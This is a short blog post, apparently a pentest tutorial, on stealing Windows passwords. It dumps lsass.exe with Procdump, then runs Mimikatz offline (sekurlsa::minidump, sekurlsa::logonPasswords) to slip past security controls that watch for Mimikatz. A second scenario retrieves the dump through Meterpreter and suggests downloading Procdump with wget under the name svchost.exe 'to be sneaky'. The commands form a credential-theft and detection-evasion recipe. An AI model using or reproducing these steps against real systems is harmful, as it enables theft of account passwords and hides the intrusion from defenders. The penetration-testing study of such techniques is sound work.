Mimikatz Part I Procdump On Lsass

This post is about extracting passwords in stealthmode by using Mimikatz offline on a Procdump of Lsass we can successfully bypass the security controls of most organizations that obviously are aware of and looking for any instance of Mimikatz during a pentest.

An Overview:

Here are the steps involved:

  • Move Procdump.exe to the victim VM
  • Procdump lsass.exe
  • Move mimikatz to the victim VM
  • Mimikatz lsassdump.dmp > sekurlsa::minidump lsassdump.dmp > sekurlsa::logonPasswords


Let’s get started.

Run procdump on lsass

screenshot


Move mimikatz to victim VM

Send from Linux/Windows screenshot And Receive from Linux/Windows screenshot


Mimikatz lsassdump.dmp

screenshot

Here you can see the return output of mimikatz on our lsassdump. The password is there, I’m not including it!.


It’s as simple as that.

Scenario II: Downloading .dmp file remotely using Meterpreter

The objective here is to get the procdump file from the victim Windows XP using the command download c:\bin\lsassdump.dmp

Note that double backslashes are needed in the filepath

Now this is assuming that Sysinternals Procdump is installed on the victim XP. It is in my case. As an alternative one could upload Procdump to the victim easily by downloading it locally on the XP using something like wget procdumpdownloadurl > svchost.exe to be sneaky..

Written on May 12, 2018